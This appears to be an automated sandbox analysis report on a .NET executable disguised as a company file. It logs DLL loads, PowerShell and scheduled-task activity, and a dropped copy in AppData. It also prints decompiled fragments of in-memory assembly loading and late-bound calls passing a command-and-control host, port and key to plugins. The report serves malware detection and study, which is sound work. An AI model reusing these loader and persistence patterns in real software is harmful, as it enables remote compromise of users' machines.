Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..lnk.9.dr

LNK file: ..\..\..\..\..\SS Bottmac Engineers Pvt. Ltd..exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
Source:	Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.7830000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4175ad0.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Memory

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786852F push edx; iretd	0_2_0786854A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786854B push edx; iretd	0_2_07868552
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868C31 push edi; iretd	0_2_07868C32
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868BBF push esi; iretd	0_2_07868BC2
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868B2B push esi; iretd	0_2_07868B32
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868B29 push esi; iretd	0_2_07868B2A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868AE8 push esi; iretd	0_2_07868AEA
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868A07 push ebp; iretd	0_2_07868A0A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07869A6B pushad ; iretd	0_2_07869A72
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07869A69 pushad ; iretd	0_2_07869A6A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_078699F0 pushad ; iretd	0_2_078699F2
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868919 push esp; iretd	0_2_0786891A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03185880 push esp; iretd	9_2_03185CE9
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_0318E2A0 push es; ret	9_2_0318E2B6
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_0318E2C0 push es; ret	9_2_0318E2D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5634D push eax; ret	12_2_04E56361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_07CC5EB2 push FFFFFF8Bh; iretd	12_2_07CC5EBB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_07CC5E79 push FFFFFF8Bh; iretd	12_2_07CC5E82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E715CD push ebx; ret	17_2_04E715DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B07C push ebp; ret	17_2_04E7B093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B178 push esp; ret	17_2_04E7B19B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7633D push eax; ret	17_2_04E76351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E76D33 pushfd ; ret	17_2_04E76D3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3634D push eax; ret	20_2_02B36361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_084973E8 push eax; retf	20_2_084973E9

Source: SS Bottmac Engineers Pvt. Ltd..exe	Static PE information: section name: .text entropy: 7.459719521334949
Source: RTUZKYTc.exe.0.dr	Static PE information: section name: .text entropy: 7.459719521334949
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Static PE information: section name: .text entropy: 7.459719521334949

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, z0CgWreVct1ReW3hxU.cs	High entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, nlbUxk0n9w0SE2fT7Q.cs	High entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OZMP2hxHpjh7kQFAPP.cs	High entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, CrrfYkO0sG17BJWtfW5.cs	High entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, xqcOSno5WVFAjguVYG.cs	High entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, Uuj6qeW9tPXjBmNpHg.cs	High entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gv9ulKIH2QRgfIOudI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, MBp5MtOrZjC7IY1p5BK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gsQB8HRrROaMJigu8D.cs	High entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jVOKqx6OHHAubw6pMN.cs	High entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	High entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dJa6sC2NfcTNVggMrM.cs	High entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, vBXDN7cPr3ZGX8ky0g.cs	High entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LuuKNTdSfqNmEuA9vR.cs	High entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.cs	High entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
